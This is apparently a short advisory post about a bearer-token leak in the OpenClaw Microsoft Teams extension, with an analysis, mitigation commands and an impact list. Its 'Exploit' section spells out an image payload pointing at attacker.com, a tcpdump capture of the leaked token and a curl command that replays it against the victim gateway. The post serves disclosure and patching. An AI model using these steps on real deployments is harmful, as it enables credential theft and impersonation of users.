Listen to this Post
This vulnerability affects OpenClaw deployments where the optional Microsoft Teams extension is enabled . When processing inbound messages containing attachments or inline images, the download mechanism retries failed requests (receiving HTTP 401 or 403 status codes) by re-sending the request with an `Authorization: Bearer
dailycve form:
Platform: npm package
Version: <= 2026.1.30
Vulnerability: Token leak via retry
Severity: High
Date: 2026-02-18
Prediction: Patch already available (2026.2.1)
What Undercode Say:
Analytics
The vulnerability stems from two architectural flaws: overly permissive allowlist definitions using suffix matching, and insecure error handling that re-transmits sensitive tokens without validating the target host. The inclusion of multi-tenant domains in the default allowlist expands the attack surface significantly. This is a classic case of a confused deputy problem, where the OpenClaw agent acts on behalf of the user but fails to properly validate the destination of sensitive credentials. The fix involves both strict allowlist management and preventing automatic retries with authentication headers to untrusted origins.
Exploit:
1. Attacker sets up a server with a domain that matches the suffix allowlist (e.g., attacker.com if .com is allowed) 2. Attacker sends a Microsoft Teams message to the victim containing an inline image: <img src="https://attacker.com/leak"> 3. When OpenClaw fetches the image, the attacker's server returns 401 Unauthorized 4. OpenClaw retries the request with the victim's Authorization: Bearer token 5. Attacker captures the token: sudo tcpdump -i eth0 -A -s 0 'tcp port 80 and host attacker.com' 6. Attacker uses the token to access the victim's OpenClaw gateway: curl -H "Authorization: Bearer <captured_token>" http://victim.local:18789/api/status
Protection from this CVE
1. Immediately update to patched version: npm update openclaw@latest Or explicitly: npm install [email protected] 2. If update is not possible, disable the vulnerable MS Teams extension: Edit OpenClaw configuration file (usually ~/.openclaw/config.yaml) sed -i 's/teams_enabled: true/teams_enabled: false/' ~/.openclaw/config.yaml 3. Harden the auth host allowlist (older versions only): Restrict to specific Microsoft-owned domains only echo "auth_allowlist:" >> ~/.openclaw/config.yaml echo " - teams.microsoft.com" >> ~/.openclaw/config.yaml echo " - graph.microsoft.com" >> ~/.openclaw/config.yaml Remove any wildcard or multi-tenant entries like .onmicrosoft.com 4. Verify no unauthorized outbound traffic: sudo lsof -i -n | grep openclaw
Impact
Successful exploitation allows an attacker to capture a valid OpenClaw bearer token. With this token, the attacker can:
– Impersonate the victim agent
– Read conversation history and private messages
– Access connected services (email, calendar, files)
– Execute commands on the host if the gateway is exposed
– Pivot to internal networks if the OpenClaw instance has network access
– Exfiltrate credentials stored in plaintext in the `~/.openclaw/` directory
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

